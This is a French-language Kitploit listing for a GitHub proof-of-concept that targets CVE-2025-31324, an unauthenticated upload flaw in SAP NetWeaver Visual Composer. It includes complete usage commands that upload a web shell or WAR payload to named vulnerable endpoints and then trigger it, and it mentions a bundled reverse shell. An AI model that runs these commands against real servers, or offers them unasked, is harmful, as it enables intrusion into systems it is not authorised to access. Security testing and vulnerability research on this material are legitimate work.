Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-31324_PoC — Preuve de concept pour CVE-2025-31324 : Téléchargement non authentifié dans SAP NetWeaver Visual Composer Metadata Uploader | Kitploit
Outils/GitHubGitHub/odst-forge/cve-2025-31324_poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubodst-forge/cve-2025-31324_poc

CVE-2025-31324_PoC

Preuve de concept pour CVE-2025-31324 : Téléchargement non authentifié dans SAP NetWeaver Visual Composer Metadata Uploader

Voir le dépôt
62il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-31324_PoC

Preuve de concept pour CVE-2025-31324 : Téléversement non authentifié dans SAP NetWeaver Visual Composer Metadata Uploader

Ce script effectue :

  1. Téléversement du fichier vers le point de terminaison vulnérable (via hôte/port de téléversement)
  2. Déclenchement optionnel via HTTP GET (via hôte/port de déclenchement)
  3. Validation et journalisation basiques de la réponse

Exemple d'utilisation : python3 PoC.py
--host sap.example.com --port 50000
--endpoint /irj/portal/sap/bc/webdynpro/sap/ZWDC_METADATA_UPLDR
--file EvilPayload.war
--trigger-path /irj/portal/irj/servlet_jsp/irj/root/EvilPayload/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https true
--bypass-portal

python3 PoC.py --host sap.example.com --port 50000
--endpoint /developmentserver/metadatauploader
--file shell.jsp
--trigger-path /visual_composer/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https

Vous avez également la possibilité de téléverser un fichier .war si vous souhaitez exécuter de cette manière. cache.jsp est un shell inversé qui vous donnera accès une fois à l'intérieur du système. (Encore en cours de résolution de problèmes)

Avertissement

Ce contenu est destiné uniquement à des fins éducatives et ne doit pas être utilisé pour des activités malveillantes. Assurez-vous toujours d'avoir les autorisations nécessaires et de respecter les directives éthiques lorsque vous testez ou recherchez des vulnérabilités de sécurité.

Pour toute question ou clarification, n'hésitez pas à nous contacter. Restez en sécurité !

Télécharger l’outil